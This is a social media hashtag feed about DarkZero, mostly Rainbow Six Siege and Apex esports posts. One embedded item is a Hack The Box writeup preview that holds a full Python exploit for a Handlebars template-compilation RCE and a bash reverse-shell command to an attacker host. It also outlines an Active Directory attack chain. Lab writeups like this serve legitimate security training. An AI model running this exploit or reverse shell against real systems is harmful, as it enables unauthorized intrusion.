#darkzero
Found my review on darkzero. It's not aged well, is v try hard, and is flat out wrong in some ways (especially my comments re: plot/worldbuilding), but it's the only game I ever gave a 10 and I was right to do so. It made so many other games redundant. darkzero.co.uk/game-reviews...
September 22, 2026 at 9:51 AM
Bad luck :( i gave it a 10/10 for darkzero back in the day. Fell in love with it :].
September 22, 2026 at 9:45 AM
JALINADarkRealm is now streaming Music on Twitch: https://twitch.tv/jalinadarkrealm

DarkZero Pre-Lounge to synthon 909:DarkWave Industrial Music vibes at the DarkRealm

#synth #synthsky #music #twitch #GSGLive
September 7, 2026 at 9:40 AM
JALINADarkRealm is now streaming Music on Twitch: https://twitch.tv/jalinadarkrealm

DarkZero Pre-Lounge to synthon 909:DarkWave Industrial Music vibes at the DarkRealm

September 7, 2026 at 9:40 AM
📰 Domínio BR na Copa do Mundo de R6: Brasil Garante Presença na Final e Pode Ter Duelo Histórico!

#Notícias #Competitivo #DarkZero #gamerscore

🔗 Leia a matéria completa
Domínio BR na Copa do Mundo de R6: Brasil Garante Presença na Final e Pode Ter Duelo Histórico!
Confira a notícia no Gamerscore
www.gamerscore.com.br
August 15, 2026 at 10:30 AM
This mickey mouse ass tournament is killing me. Every NAL team is on one side of the bracket. Lets throw in Liquid, Falcons, the top Chinese team, and my sweet baby boys CAG too why not.

Why even have another bracket? TF is this??
August 5, 2026 at 8:44 PM
Difficulty: Hard · OS: Windows two-forest Active Directory, reached through a Linux edge host
Chain: Handlebars AST type-confusion RCE → credential reuse → Gitea CI pipeline poisoning
→ service-account takeover → ksu name-collision local root → DA via reused DB password →
cross-forest golden […]
Hack The Box - HTB DarkZero Returns Writeup - Hard - Weekly - July 25th, 2026
**Difficulty:** Hard · **OS:** Windows two-forest Active Directory, reached through a Linux edge host **Chain:** Handlebars AST type-confusion RCE → credential reuse → Gitea CI pipeline poisoning → service-account takeover → `ksu` name-collision local root → DA via reused DB password → cross-forest golden ticket (SID-filter bypass) → `SeBackupPrivilege` → DCSync → root * * * ## 1. Redaction key & script conventions All instance-specific secrets are stripped: IPs, flags, passwords, hashes, SIDs, tokens. Every script below reads these from environment variables instead of hardcoding them, so the scripts are complete and functional — you populate the variables from your own recon as you go. Placeholder / env var | What it is | Where it comes from ---|---|--- `$TARGET` | public IP of the box | HTB machine panel `$ATTACKER` | your `tun0` IP | `ip -4 addr show tun0` `$DC01` `$DC02` `$SRV01` | internal AD hosts | discovered post-pivot, §7 `$INT_CIDR` | internal subnet | routing table on the edge host `$OFF` | seconds the DC clock leads yours | computed in §2.3 `$DB_PASS` | app MySQL password | `.env` via RCE, §5 `$JOSH_PASS` | domain user `josh` | crack app bcrypt, §5 `$CELIA_PASS` | domain user `celia` (DA) | crack backup bcrypt, §12 `$GIT_PASS` | password for the Gitea account you self-register | you choose it `$ROOTPRINC_PASS` | password for the AD principal you create | you choose it `$EXT_SID` `$HTB_SID` | domain SIDs, no RID | `bloodyAD get object ... --attr objectSid` `$KRBTGT_AES` | `.ext` krbtgt AES256 key | DCSync as celia, §13 `$DC01_NT` | DC01 machine account NT hash | offline hive parse, §14 `$ADMIN_NT` | `.htb` Administrator NT hash | DCSync as DC01$, §14 `$PUBKEY` | your SSH public key contents | `ssh-keygen`, §10 Flag values are omitted entirely. * * * ## 2. Approach — how we worked the box, and environment prep ### 2.1 Overall method Before any exploitation, three structural facts changed how we approached everything after: 1. **Only two ports are open, and the box is billed as Windows.** That mismatch is the whole shape of the box: the thing you can reach directly is a thin Linux edge, and the real target — a two-forest AD estate — is entirely hidden behind it. This told us the web app was not "a service to break for its own sake" but a **pivot vehicle** , so we prioritized finding _some_ command execution primitive over finding a clean/elegant one. 2. **`ksu` and Kerberos-heavy tooling meant clock skew would dominate debugging time** if we didn't solve it up front — Kerberos failures ("clock skew too great", "ticket not yet valid") look identical to authentication failures, and we didn't want to misattribute a skew problem to a wrong password or a broken exploit. So skew handling (`faketime`) was built before touching AD, not bolted on when the first weird error appeared. 3. **A Linux member server joined via SSSD is itself a domain identity provider.** Any local shell we got on it was worth checking against `/etc/nsswitch.conf` / `sssd.conf` / `realm list` immediately, because SSSD-joined hosts routinely have looser login policies than the DC itself (this paid off directly — see §6). The rest of the write-up follows the natural dependency order the box enforces: you cannot skip to the Gitea stage without the pivot, cannot pivot without a domain credential, and cannot get a domain credential without the web RCE. But _within_ each stage we describe the dead ends we hit first, because most of them are natural things to try and the reason they fail is instructive (SID filtering, `SeBackupPrivilege` scope, `CREATE_CHILD` invisibility in BloodHound, etc). ### 2.2 MTU sudo ip link set dev tun0 mtu 1300 **Why this had to be figured out first:** early in this box, large requests (a sizeable `git push`, a big JSON `PUT`) simply hung forever with zero error output, while everything else — logins, small API calls, SSH — worked fine. That asymmetry (works small, hangs big) is the signature of a **path-MTU black hole** , not a broken exploit or a dead service. The HTB VPN silently drops any packet larger than roughly 1300 bytes instead of fragmenting or returning ICMP "too big." Once diagnosed, the fix is a standing rule: cap `tun0` at 1300. **Consequential detail:** `tun0` resets to MTU 1500 on every VPN reconnect. If something that worked an hour ago starts hanging again with no config change on your end, check this before anything else. ### 2.3 Name resolution $TARGET dzcampaigns.htb # added after the pivot (§7) — do not resolve before then $DC01 dc01.darkzero.htb darkzero.htb DC01 $DC02 gitea.darkzero.ext dc02.darkzero.ext darkzero.ext DC02 $SRV01 srv01.darkzero.ext SRV01 ### 2.4 Clock skew We noticed the DCs were dramatically time-shifted the moment the first Kerberos attempt failed with a skew error despite a correct password — which told us this wasn't a wrong-credential problem. Rather than fight `systemd-timesyncd` (it kept dragging the local clock back mid-operation, invalidating tickets we'd just gotten), we settled on presenting DC time only to the specific commands that need it, via `faketime`: OFF=$(( $(date -u -d "$(curl -sSI http://gitea.darkzero.ext:3000/ \ | grep -i '^Date:' | sed 's/^[Dd]ate: //' | tr -d '\r')" +%s) - $(date -u +%s) )) echo $OFF # → $OFF, roughly 25200 (~7 hours) Any HTTP service on a domain-joined host is a usable time oracle — the `Date:` header is precise enough for Kerberos' ~5-minute tolerance. **Standing rule for the rest of the box:** on **Kali** , prefix every Kerberos-touching command with `faketime -f "+${OFF}s"`. On **SRV01** once we have a shell there, **never** — that host's clock is already synced to the DC, and applying the offset a second time breaks things instead of fixing them. This distinction cost real time on the first attempt at this box and is worth internalizing before you start. ### 2.5 `/etc/krb5.conf` Both realms, DNS lookups disabled (internal DNS answers were inconsistent through the pivot, and `rdns` in particular handed back the wrong SPN on at least one lookup): [libdefaults] default_realm = DARKZERO.EXT dns_lookup_realm = false dns_lookup_kdc = false rdns = false [realms] DARKZERO.EXT = { kdc = $DC02 admin_server = $DC02 } DARKZERO.HTB = { kdc = $DC01 admin_server = $DC01 } [domain_realm] .darkzero.ext = DARKZERO.EXT darkzero.ext = DARKZERO.EXT .darkzero.htb = DARKZERO.HTB darkzero.htb = DARKZERO.HTB * * * ## 3. Recon nmap -p- --min-rate 5000 -Pn $TARGET nmap -p22,80 -sCV -Pn $TARGET 22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.18 80/tcp open http nginx 1.24.0 (Ubuntu) → redirects to http://dzcampaigns.htb/ Two ports, Ubuntu banners, but the machine is labeled Windows — as discussed in §2.1 this is the load-bearing observation of the whole recon phase. Add the vhost and move on to the app; there is nothing else to enumerate at the network layer yet. echo "$TARGET dzcampaigns.htb" | sudo tee -a /etc/hosts Cookie/header inspection (`whatweb`, or just watching `Set-Cookie`): the app sets `dz.sid `— an `express-session` signed cookie — and returns a weak ETag. That's enough to place this as a **custom Node/Express application** , not an off-the-shelf CMS, which sets the expectation that any vulnerability here is bespoke rather than a known CVE we can just search for by product name. * * * ## 4. Web app reconnaissance: "DarkZero Campaigns" A D&D-themed campaign manager. Registration is open. After logging in, the interesting surface is character creation (`/character/new`), which has a `campaign_message` field whose **default placeholder text is itself a template** : A new face emerges! The {{race}} {{class}} {{name}} has joined the campaign... That placeholder is the tell — it means the field is rendered through some templating engine, and since the message is echoed back non-blind in the campaign log (`GET /campaign/1`), we have direct visibility into the render output. Two things ruled out immediately, both worth mentioning because they're the obvious next things to try and both were dead ends: * `/dice` — looked promising for a server-side RNG attack, but it's 100% client-side (`crypto.getRandomValues`). No server involvement at all. * Brute-forcing login — rate-limited at roughly 10 attempts / 900s. Not viable, not needed. ### 4.1 Fingerprinting the template engine We didn't assume Handlebars — we tested candidate syntaxes against the render sink to rule engines in or out: Input | Result | Inference ---|---|--- `{{7*7}}` | HTTP 400 (parse error) | strict parser — arithmetic isn't valid syntax here `{{race}}` | renders correctly | the field name works as a normal variable `{{#if true}}IFOK{{/if}}` | → `IFOK` | Handlebars-specific literal/block handling `{% if true %}...{% endif %}` | rendered **literally** , not evaluated | rules out Nunjucks/Jinja2/Liquid — that syntax means nothing to this engine `{{#with "s" as | x | }}WITHOK{{/with}}` Conclusion: **Handlebars** , and a reasonably modern one (block params supported). ### 4.2 The obvious SSTI payload — and why it fails The standard Handlebars RCE walks the prototype chain through a helper: {{#with "s" as |string|}}{{#with (string.sub.apply 0 "console.log(process.mainModule.require('child_process').execSync('id'))")}}{{/with}}{{/with}} This returns an **empty render** , not an error — `s.constructor` access is silently blocked. That's the signature of Handlebars' built-in **prototype access guard** (`allowedProtoMethods` / `allowedProtoProperties`, present since Handlebars ≥ 4.6): it's not that the template is malformed, it's that the engine is actively refusing to resolve `.constructor` off a primitive. Trying variations on this theme (different primitives, different chained property paths) is not going to get further — the guard is a property filter applied at property-access time, so any path through `.constructor` is caught the same way. We stopped pushing on this axis and asked a different question: is there a way to get code execution that doesn't go through the _runtime_ proto guard at all? ### 4.3 The actual bug — CVE-2026-33937 (Handlebars AST type-confusion) `Handlebars.compile()` has always accepted two distinct input shapes, which is easy to miss because almost everyone only ever passes the first: 1. a **string** — the normal case, which the library parses into an AST and then compiles; 2. an **already-parsed AST object** — used internally / by tooling that pre-parses — which is compiled **directly, skipping the parser entirely**. `compile()` distinguishes the two by checking whether the input is an object with `.type === 'Program'`. This matters because the runtime proto guard we just hit in §4.2 is enforced by the **parser/runtime helpers** , not by the code generator — if we can hand `compile()` a pre-built AST, we bypass the layer that was blocking us, because we're no longer relying on any helper call the guard instruments. The code generator assumes any AST it receives came from its own parser, and therefore trusts node **types** without re-validating them. In particular, it emits a `NumberLiteral`'s `.value` into the generated JavaScript **unquoted** — reasonable, since a genuine number literal can never contain syntax that needs escaping: // conceptually, inside the codegen: case 'NumberLiteral': return String(node.value); // no quoting, no escaping — "trusted" If `.value` is a **string** instead of a number, that's a type confusion the generator never checks for, and the string's contents are spliced raw into the compiled function body. That is arbitrary JavaScript execution at template-compile time — a different, and much stronger, primitive than the guarded runtime helper calls of §4.2. The remaining problem: the app's form field is a plain HTML `<textarea>`, so a normal submission always arrives as a string, never an object. **Express's JSON body parser** solves this — if the app calls `express.json()` (a near-universal default) and we send `Content-Type: application/json` instead of the form's normal `application/x-www-form-urlencoded`, the same field can be posted as a nested JSON object. The application code passes whatever it receives straight to `Handlebars.compile()` without checking that it's a string first. That's the full bug: **user-controlled AST reaches an API that trusts AST node types, delivered via a body-parser type confusion the app never guards against.** (We also noted the box pins `handlebars@4.7.8` — the last version affected before this class of bug was patched — in `package.json`, which confirmed we had the right vulnerability class once we found it, though the fingerprinting in §4.1–4.2 is what actually led us here rather than reading the manifest first.) ### 4.4 Constructing the payload The injected string must be syntactically valid at the exact point the generator splices it in. Empirically (and confirmable by reading generated Handlebars output), a helper call in generated code is shaped roughly like `helper.call(depth0, arg0, arg1))`. Our poisoned `NumberLiteral` sits in the `arg1` position, so our string has to: 1. **close the argument list and the call parentheses** we're sitting inside: `{},{}))` 2. **concatenate our own expression into the output buffer** : `+ <js>` 3. **comment out whatever the generator planned to emit next** , since we can't predict or balance it syntactically: `//` value = "{},{})) + process.mainModule.require('child_process').execSync('<cmd>').toString() //" **Gadget choice matters and is version-dependent.** The target runs Node < 22.3, where `process.getBuiltinModule` doesn't exist yet — you must use `process.mainModule.require('child_process')`. On Node ≥ 22.3 that call is unavailable and you'd need the reverse. Keep both gadgets in the exploit and let the target decide. We chose the built-in `lookup` helper (`{{lookup this X}}`) as the carrier because it's (a) guaranteed to exist without touching user templates, and (b) takes exactly two arguments, matching the two-argument call shape we needed to break out of. ### 4.5 Full exploit script `hbs_rce.py` — handles account bootstrap (register-then-login, since a fresh box spawn has no account yet), delivers the AST payload as a JSON body, and reads the rendered output back out of the campaign log: #!/usr/bin/env python3 # CVE-2026-33937 - Handlebars AST type-confusion RCE # Target: DarkZero Campaigns -> campaign_message sink import os, re, sys, requests BASE = f"http://{os.environ.get('DZ_HOST', 'dzcampaigns.htb')}" USER = "user" EMAIL = "user@user.user" PASS = "HelloWorld@#" CAMPAIGN = "1" # Node <=22: process.mainModule.require | Node >=22.3: process.getBuiltinModule GADGETS = { "mainModule": "process.mainModule.require('child_process').execSync('{cmd}').toString()", "builtin": "process.getBuiltinModule('child_process').execSync('{cmd}').toString()", } s = requests.Session() def csrf(path): r = s.get(BASE + path, timeout=20) m = re.search(r'name="_csrf" value="([^"]+)"', r.text) return m.group(1) if m else None def register(): t = csrf("/register") r = s.post(BASE + "/register", data={"_csrf": t, "username": USER, "email": EMAIL, "password": PASS}, timeout=20, allow_redirects=False) print(f"[*] register -> {r.status_code} {r.headers.get('Location','')}") return r.status_code == 302 def login(): t = csrf("/login") r = s.post(BASE + "/login", data={"_csrf": t, "email": EMAIL, "password": PASS}, timeout=20, allow_redirects=False) print(f"[*] login -> {r.status_code} {r.headers.get('Location','')}") return r.status_code == 302 def ast(cmd, gadget="mainModule"): js = GADGETS[gadget].format(cmd=cmd.replace("'", "\\'")) return { "type": "Program", "body": [{ "type": "MustacheStatement", "path": {"type": "PathExpression", "data": False, "depth": 0, "parts": ["lookup"], "original": "lookup", "loc": None}, "params": [ {"type": "PathExpression", "data": False, "depth": 0, "parts": [], "original": "this", "loc": None}, {"type": "NumberLiteral", "value": "{},{})) + " + js + " //", # string, not number: the confusion "original": 1, "loc": None}, ], "escaped": True, "strip": {"open": False, "close": False}, "loc": None, }], "strip": {}, "loc": None, } def run(cmd, name, gadget="mainModule"): t = csrf("/character/new") body = {"_csrf": t, "name": name, "race": "Elf", "class": "Rogue", "backstory": "x", "campaign_id": CAMPAIGN, "campaign_message": ast(cmd, gadget)} r = s.post(BASE + "/character", json=body, timeout=25, allow_redirects=False) print(f"[*] inject ({gadget}) -> HTTP {r.status_code}") return r.status_code def last_messages(n=3): r = s.get(f"{BASE}/campaign/{CAMPAIGN}", timeout=20) msgs = re.findall(r"<div class=\"message\">\s*<p>(.*?)</p>", r.text, re.S) for m in msgs[-n:]: print("---\n" + m.strip()) if __name__ == "__main__": cmd = sys.argv[1] if len(sys.argv) > 1 else "id" gadget = sys.argv[2] if len(sys.argv) > 2 else "mainModule" if not login(): print("[*] login failed, registering fresh account") register() if not login(): sys.exit("[-] login failed after register") run(cmd, "rce" + str(abs(hash(cmd)) % 9999), gadget) last_messages() Run it (set `DZ_HOST` if your `/etc/hosts` entry differs): python3 hbs_rce.py 'id; hostname' # [*] login failed, registering fresh account # [*] register -> 302 /login # [*] login -> 302 /dashboard # [*] inject (mainModule) -> HTTP 200 # --- # uid=996(darkzero) gid=987(darkzero) groups=987(darkzero) # SRV01 > **Note — intermittent HTTP 400.** Character names are derived from `hash(cmd)`, so > re-running the exact same command string collides with the previous character and 400s. > Login is also rate-limited (~10/900s). A 400 here is virtually always one of those two > causes, not a broken payload — vary the command slightly (or just retry) before spending > time re-deriving the AST. Get a real shell (detach with `setsid` so `execSync` doesn't block the HTTP request waiting for a process that never exits): python3 hbs_rce.py "setsid bash -c 'bash -i >& /dev/tcp/\$ATTACKER/9001 0>&1' >/dev/null 2>&1 &" → reverse shell as **`darkzero`** on **SRV01**. * * * ## 5. Post-exploitation on SRV01 — pivoting to a domain credential With a shell as `darkzero`, the obvious next move for any Node app is to check its own config: cat ~/.env # PORT=8081 DB_HOST=localhost DB_USER=darkzero # DB_PASSWORD=$DB_PASS DB_NAME=darkzero_campaigns # SESSION_SECRET=<redacted> The session secret isn't useful to us directly (we're not forging our own app sessions for anything), but the DB password lets us read the app's own user table — worth checking because web apps frequently store credentials that turn out to be reused elsewhere, and that instinct pays off twice on this box (here, and again in §12): ### This post is for subscribers only Become a member to get access to all content Subscribe now
1337sheets.com
July 27, 2026 at 9:05 AM
They drop, they're dead. 💥🌵
A rush into the site won't get too far. ⛔​
_____________________________________

🎮 Rainbow Six Siege: DARKZERO vs. WILDCARD - NAL STAGE 1 PLAYOFFS

🔴 Youtube: Urban Leshy (🔗 Link in Bio)

#️⃣ #r6 #rainbowsixsiege #r6proleague #siege #esports #r6clips #ranked
July 13, 2026 at 3:20 PM
Terminate the Thermite☠️​💥​
I'm literally quitting if I die from this angle.
_____________________________________

🎮 Rainbow Six Siege: DARKZERO vs. WILDCARD - NAL STAGE 1 PLAYOFFS

🔴 Youtube: Urban Leshy (🔗 Link in Bio)

#️⃣ #r6 #rainbowsixsiege #r6proleague #siege #esports #r6clips #ranked
July 13, 2026 at 12:44 PM
Even pros make mistakes🫟​​❌
So don't be so mean to your randoms (me)🥺
_____________________________________

🎮 Rainbow Six Siege: DARKZERO vs. WILDCARD - NAL STAGE 1 PLAYOFFS

🔴 Youtube: Urban Leshy (🔗 Link in Bio)

#️⃣ #r6 #rainbowsixsiege #r6proleague #siege #esports #r6clips #ranked #rankedtips
July 12, 2026 at 3:53 PM
I want 10 free points!🤑
Since Siege is an intel game, take away their standard cams as fast as possible.
_____________________________________

🎮 Rainbow Six Siege: DARKZERO vs. WILDCARD - NAL STAGE 1 PLAYOFFS

🔴 Youtube: Urban Leshy

#️⃣ #r6 #rainbowsixsiege #r6proleague #siege #esports
July 11, 2026 at 10:08 PM
Ibwrote a review of that on darkzero years ago and the editor called it pornographic haha
July 11, 2026 at 3:31 PM
ALGSに一人で行った。もう一人では行かない。

海外掲示板にてある一人の投稿者の発言が感動を呼んだ。  以下投稿者の発言 私は、マスティフとクレーバーしかケアパッケージ武器がなかった頃からApex Legendsをプレイしている大ファンです。正直に言うと、一緒にApexを遊ぶ友達はほとんどいません。一人だけいますが、大勢の人が集まる場所が苦手で、ALGSのようなイベントには絶対に来ません。だから、ロンドンでALGS Split 2…
ALGSに一人で行った。もう一人では行かない。
海外掲示板にてある一人の投稿者の発言が感動を呼んだ。  以下投稿者の発言 私は、マスティフとクレーバーしかケアパッケージ武器がなかった頃からApex Legendsをプレイしている大ファンです。正直に言うと、一緒にApexを遊ぶ友達はほとんどいません。一人だけいますが、大勢の人が集まる場所が苦手で、ALGSのようなイベントには絶対に来ません。だから、ロンドンでALGS Split 2 Playoffsが開催されると知ったとき、人生で初めて一人で観戦へ行くことにしました。会場ではImperialHal率いるTSMや、SweetdreamsのNRG、Zer0とGenburtenのDarkZeroなど、大好きなチームを生で見ることができました。本当に素晴らしい体験でした。そして気付いたのは、自分と同じように一人で来ている人がたくさんいたことです。その光景が、今でも心に残っています。 最近、自分はApexに夢中になっていることを恥ずかしいと思わなくなりました。これは仕事終わりや休日を楽しむ、自分の趣味なんです。私たちの世代は、これまでで最も人とつながれる時代なのに、同時に最も孤独な世代でもあります。私は昨年、その孤独を痛感しました。仕事を辞めて海外を旅行し、多くの人と出会いましたが、帰国すると恋人とは別れ、仕事もなく、お金もなく、太ってしまい、実家で暮らすことになりました。誰にも頼れず、本当に苦しい時期でした。そこで勇気を出してカウンセリングを受けました。そこで気付いたのは、多くの人が「相談すると迷惑になる」と思い込んでいるということです。でも、大切な人が苦しんでいるのに何も相談してくれなかったら、その方が悲しいと思いませんか。 私は今、仲間が欲しいと思っています。だからこのRedditに投稿しました。2027年1月に札幌で開催されるALGS Championshipへ行く予定です。同じようにApexが好きな人たちと出会い、一緒に大会を楽しみたい。 最初はただ一緒に試合を見るだけでもいい。でも、そこから友達になれたら最高です。 ちなみに今の私は元気です。15kgの減量にも成功し、仕事にも復帰しました。この投稿は同情してほしいわけではありません。以前の自分と同じように孤独を感じている人へ、「一緒に行こう」と手を差し伸べたいだけです。 追記として、ラスベガスで開催されるALGS Split 2 Playoffsの方が参加しやすい人も多いかもしれないと考えています。ラスベガスと札幌、どちらに興味があるかコメントしてください。みんなで何か企画できたら嬉しいです。 投稿へのコメント -- ロンドンでのLANイベントに一人で参加したんですが、そこで出会った2人が、今では最高のネット友達になっています!案外、なんとかなるものですよ。 -- それ、最高だね。俺も趣味や友達は多いけど、君と同じような状況にいたことがあるから気持ちはわかるよ。 言っておきたいのは、俺自身マウンテンバイクやボルダリング、 スケボーなんかもやるけど、『Apex』も他の趣味と同じくらい楽しんでるってこと。最高に面白いゲームなんだから、好きであることを恥ずかしがる必要なんてないよ! ただ 、やられるたびに味方のせいにするような「トキシック(有害)」な連中にはならないでくれよな。あれは本当にみっともないから。たとえ世界最悪のチームと組んでいたと しても、やられたのは結局自分の責任なんだからさ。 リリース当初からずっとプレイしてるよ。全レジェンドで「20キルバッジ(20ボム)」を取るくらいハマったし、プレデ ターランクに到達したこともある。つまり、それだけ膨大な時間をこのゲームに費やしてきたってことだ。 ALGSに向けたメンバー探し、頑張ってね。君のやってることは本当 にすごいことだし、俺にはちょっと手が出せない(費用的に)けど、全面的に応援してるよ。 -- 最高だね!!マジでイケてるよ!!これからも頑張って、日本で最高の時間を過ごしてきてくれ!! -- 一人での参加だったので、トイレなどで席を外した際に荷物を盗まれないかが一番の心配事でした(Y4 LA Split 1 LANにて)。 -- グループで行動すべき、もう一つの理由ですね。次は誰かが力になってくれるといいですね。 -- 2026年の決勝戦は(13歳のプレイヤーである)息子と一緒に配信で見たけれど、あれをもう一度やるつもりはない。2027年の決勝戦には、間違いなく現地へ行くつもりだ。 -- 『Apex』は数年前にやめてしまいましたが、リリース初日からプレイしていた古参プレイヤーです。NiceWiggが実際にウィッグを被っていた頃からずっと彼を追っていました し、ここLAで開催されたALGSにも一人で観戦に行きました。あのLAN大会以降はあまり追えていませんでしたが、この投稿がフィードに流れてきて本当に良かったです。投稿の 露出が増える助けになればと思い、コメントを残しました。投稿者さんは本当に素晴らしい方ですね。これからの人生に、幸せと成功がたくさん訪れることを願っています。 -- もしアメリカで開催されるALGSに行くことになったら、ぜひ教えてください。都合がつけば、私も参加します。以前『StarCraft』の大会で同じことをした際、本当に素晴らし い友人たちと出会うことができましたから。 -- これ、たぶんALGS関連で最高のマーケティングだわ(笑)しかもApex公式ですらないっていうね -- 引用元
esports4.net
July 6, 2026 at 5:19 AM
A quick recap of the Salt Lake City Major with my impressions, and what to look forward to throughout this year
What's next for the 2026-2027 Rainbow Six Siege esports season?
The first major of the 2026-2027 competitive Rainbow Six Siege season ended in a blowout victory for DarkZero, defeating Shopify Rebellion 3 maps to one in the Grand Final. The showdown between these two NA giants started off a little rocky for DarkZero with a 7-2 loss on map 1, however they were able to turn it around, absolutely dominating the next 3 maps to take the win and hoist the Dokkaebi trophy. This was my first time attending any esports event, and as some of you may have noticed, I have an extra soft spot in my heart for Rainbow Six Siege. I was very appreciative to Ubisoft for inviting me to this event. Nothing compares to being there in person to feel the rush of the crowd and see it all unfold on the mainstage. The Salt Lake City Major, taking place at the Salt Palace Convention Center, was full of some of the craziest twists, upsets, and truly remarkable moments in R6 esports. Who could forget Ambi’s record-breaking 21-1 k/d match in Shopify Rebellion’s victory over G2 Esports? Or watching back-to-back Six Invitational champs FaZe Clan getting decimated by DarkZero on their most dominant map? The Swiss Stage was easily the wildest phase, with several high-performing teams being eliminated, like Five Fears, Furia, Weibo Gaming, and All Gamers, who were all first place in their respective regional kickoff qualifiers. It was at this point that viewers and co-streamers realized their predictions were cooked, and dreams of getting the Year 11 Season 2 battle pass for free evaporated. The games were unreal, but the crowd was even more insane. In the semifinal matches of Shopify Rebellion vs Twisted Minds and DarkZero vs FaZe Clan, chants of “USA! USA! USA!” and “SEND THEM HOME” were on repeat as SR and DZ battled the _foreign invaders_ , ultimately defeating them before moving on to the Grand Final. But the real moment of magic was watching a marriage proposal live, which garnered the loudest roars and cheers from the crowd. However, the wins don’t stop there. The Salt Lake City Major was the most-watched major in R6 Esports history, with over 254,000 peak viewers and over 7.5 million hours of watchtime, which is double the numbers compared to the Munich Major back in November last year. This explosive rise in viewership is most certainly due to the over 200 content creators who co-streamed the event on YouTube and Twitch, with exclusive drops on Twitch throughout the Major’s 11-day run. While most of those drops were esports packs, there were also a handful of cosmetics and other items for viewers to collect that could then be showcased in game, such as weapon skins and charms. Of course, BLAST also knows how to put on a good show. A partnership that launched in March 2023, BLAST and Ubisoft co-produce all the big R6 Esports events, including the majors, Six Invitational, and regional tournaments (with support from additional partners). The production value of each showcase is next level, both virtually and in person. From the flow of the event to captivating broadcasts to the on-site sound design and aesthetic, every show is unique and engaging, which is further enhanced by dozens of incredibly talented hosts, casters, and analysts who break down the action in real time. Salt Lake City made for a beautiful setting for the major, with the backdrop of the still snowcapped mountains against the city skyline, the Great Salt Lake, and the salt flats all within a short driving distance. The weather wasn’t too shabby either, with temperatures hovering in the 80s F for most of the event’s duration. There was a lot of pushback, however, regarding the host country, especially after all the announcements of visa issues. Most notably, of course, was the unfortunate forfeiture of Wolves Esports (CNL) after the whole team’s visas were denied, making them unable to make the journey to Salt Lake City. Several other players were also denied visas, which required teams to use stand-in players from other organizations to fill their active rosters. There were many calls for the event to be taken out of the United States entirely, especially amidst the current tensions in the country regarding ICE and the political climate. However, the event moved forward with the roster and attendee updates. So what’s next? Over the next couple of months, teams will compete in the first regional stages. Stage 1 has already started for the CNL, EML, and APL regions, with SAL and NAL starting later this week. These games will be critical as teams are trying to rack up points for Six Invitational 2027. DarkZero and Shopify Rebellion are already well on their way to qualifying, almost guaranteeing their place by earning 1500 and 1200 points, respectively. Only the top 16 teams in the global standings will qualify for S.I., so these next six months will be critical. In August, teams will compete in the Esports World Cup, the winning team earning a direct qualification for S.I., which will then be followed by the second regional stages throughout September and October. The next major will take its qualifying teams to Osaka, Japan, in November, which will be the last opportunity teams will have to secure points. After that, teams will spend the last couple of months preparing for the season finale, with Six Invitational 2027 taking place in Brazil in February. We'll have more recaps as the season progresses, so make sure to stay tuned!
gamingtrend.com
June 9, 2026 at 2:28 AM
DarkZero é campeã do Major Salt Lake City de Rainbow Six Siege
Leia mais em: https://geeksunited.com.br/darkzero-campea-major-salt-lake-city-rainbow/
DarkZero é campeã do Major Salt Lake City de Rainbow Six Siege
Equipe do brasileiro Kyno superou a Shopify Rebellion na grande final por 3 a 1 O Major Salt
geeksunited.com.br
May 18, 2026 at 3:30 PM
DarkZero e Shopify Rebellion decidem Major de Rainbow Six Siege neste domingo
Leia mais em: https://geeksunited.com.br/final-major-rainbow-six-siege/
DarkZero e Shopify Rebellion decidem Major de Rainbow Six Siege neste domingo
A grande final do Major Salt Lake City, primeira competição internacional da temporada 2026 de Rainbow Six Siege,
geeksunited.com.br
May 18, 2026 at 3:00 PM
North American team DarkZero wins the Salt Lake City Rainbow Six Siege Major and takes home a prize of R$1 million.

todowebrasil.blogspot.com/2026/05/nort...

@darkzerogg.bsky.social @r6esports.bsky.social @shopifyrebellion.gg @ubisoft.com #rainbowSixSiege #eSports
Norte-americana DarkZero é campeã do Major Salt Lake City de Rainbow Six Siege e conquista premiação de R$ 1 milhão
todowebrasil.blogspot.com
May 18, 2026 at 12:55 PM
My R6 goats DarkZero got another major win in Salt Lake 🥳
May 18, 2026 at 3:15 AM
DarkZero are the R6 SLC Major Champions!!
May 18, 2026 at 1:50 AM